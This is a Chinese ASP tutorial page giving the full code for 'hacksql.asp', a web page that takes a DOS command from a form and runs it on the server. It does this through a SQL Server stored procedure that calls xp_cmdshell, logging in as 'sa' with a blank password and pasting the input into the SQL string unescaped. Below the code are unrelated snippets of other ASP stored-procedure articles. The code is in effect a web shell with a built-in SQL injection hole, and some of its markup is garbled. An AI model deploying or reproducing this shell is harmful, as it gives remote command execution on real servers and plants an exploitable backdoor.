利用sql的存储过程实现dos命令的asp程序

2016-01-29 20:16 4 1 收藏

利用sql的存储过程实现dos命令的asp程序,利用sql的存储过程实现dos命令的asp程序

【 tulaoshi.com - ASP 】

1、首先在sql里面你能够访问的数据库里面建立存储过程，比如说：ddy
如下：
CREATE PROCEDURE ddy
@cmd varchar(50)
AS
exec master..xp_cmdshell @cmd
2、asp程序里如下：（hacksql.asp）
<%
cmd=trim(Request.Form("cmd"))
if cmd<"" then
work()
else
show()
end if
function work()
set conn=server.CreateObject("adodb.connection")
set rs=server.CreateObject("adodb.recordset")
conn.Open "xx","sa",""
sql="exec ddy '"&cmd&"'"

rs.Open sql,conn
if not rs.EOF then
do while not rs.eof
Response.Write "<pre"&htmlencode2(trim(rs(0)))&"</pre"
rs.MoveNext
loop
else
Response.Write "no"
end if
if rs.State=1 then rs.close
set rs=nothing
conn.Close
set conn=nothing
end function
function show()
%
<form action=hacksql.asp method=post
请输入DOS命令：<input type=text name=cmd
<input type=submit value="ok"
</form
<%
end function
function htmlencode2(str)'--------转换函数（为了显示时比较工整）
dim result
dim l
if isnull(str) then
htmlencode2=""
exit function
end if
l=len(str)
result=""
dim i
for i = 1 to l
select case mid(str,i,1)
case "<"
result=result+"<"
case ""
result=result+""
case chr(34)
result=result+"""
case "&"
result=result+"&"
case chr(13)
result=result+"<br"
case chr(9)
result=result+" "
case "'"
result=result+"’"
case chr(32)
result=result+" "
if i+1<=l and i-10 then
if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) then
result=result+" "
else
result=result+" "
end if
else
result=result+" "
end if
case else
result=result+mid(str,i,1)
end select
next
htmlencode2=result
end function
%

来源:https://www.tulaoshi.com/n/20160129/1510936.html

上一篇：看人家用使用InstallShield制作ASP安装程序(2)
下一篇：看人家用使用InstallShield制作ASP安装程序(3)

看过《利用sql的存储过程实现dos命令的asp程序》的人还看了以下文章更多>>

asp存储过程使用

标签： ASP

1、调用没有参数的存储过程 <% set conn=server.CreateObject("adodb.connection") set cmd=server.CreateObject("adodb.command") strconn="dsn=pubs;uid=sa;pwd" conn.Open strconn set cmd.ActiveConnection=conn cmd.CommandText="{call nono}" 'set rs=cmc.exe 或者cmd.execute set rs=cmd.Execute() % 2、一个输入的参数的存储过...

存储过程介绍及asp+存储过程的使用

标签： ASP

一、先介绍一下什么是存储过程存储过程是利用SQL Server所提供的Tranact-SQL语言所编写的程序。Tranact-SQL语言是SQL Server提供专为设计数据库应用程序的语言，它是应用程序和SQL Server数据库间的主要程序式设计界面。它好比Oracle数据库系统中的Pro-SQL和Informix的数据库系统能够中的Informix-4GL语言一样。这类语言主要提供以...

SQL Server 存储过程的分页

标签： ASP

建立表： CREATE TABLE [TestTable] ( [ID] [int] IDENTITY (1, 1) NOT NULL , [FirstName] [nvarchar] (100) COLLATE Chinese_PRC_CI_AS NULL , [LastName] [nvarchar] (100) COLLATE Chinese_PRC_CI_AS NULL , [Country] [nvarchar] (50) COLLATE Chinese_PRC_CI_AS NULL , [Note] [nvarchar] (2000) COLLATE Chinese_PRC_CI_...

ASP调用oracle存储过程

标签： ASP

<!--#include file="inc\public.asp"-- <!--#include file="inc\conn.asp"-- <html <head <meta http-equiv="Content-Type" content="text/html; charset=gb2312" <title</title </head <body <% '----------------------------------- dim sp_common Set sp_common = Server.CreateObject("ADODB.Co...

用存储过程实现ASP对数据库访问

标签： ASP

一、ADO概述 ActiveX 数据对象 (ADO) 是一种既易于使用又可扩充的技术，用来将数据库访问添加到您的 Web 页可以使用 ADO 编写简洁和可升级的脚本以连接到与 OLE DB 兼容的数据源，如数据库、电子表格、顺序数据文件或电子邮件目录。OLE DB 是一个系统级的编程接口，它提供一套标准的 COM 接口，用来展示数据库管理系统的功能。使用 ADO...

查看更多精彩>>